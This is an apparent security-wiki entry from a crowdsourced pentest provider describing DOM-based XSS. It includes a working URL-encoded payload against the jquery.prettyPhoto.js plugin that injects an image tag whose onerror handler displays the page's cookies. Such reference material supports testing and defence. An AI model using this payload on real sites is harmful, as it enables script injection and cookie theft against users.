Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

DOM-Based XSS

POC

** jquery.prettyPhoto.js is used in this PoC since it’s vulnerable to DOM XSS Add the following payload to the vulnerable URL

prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//

Impact

Medium

Likelihood

Medium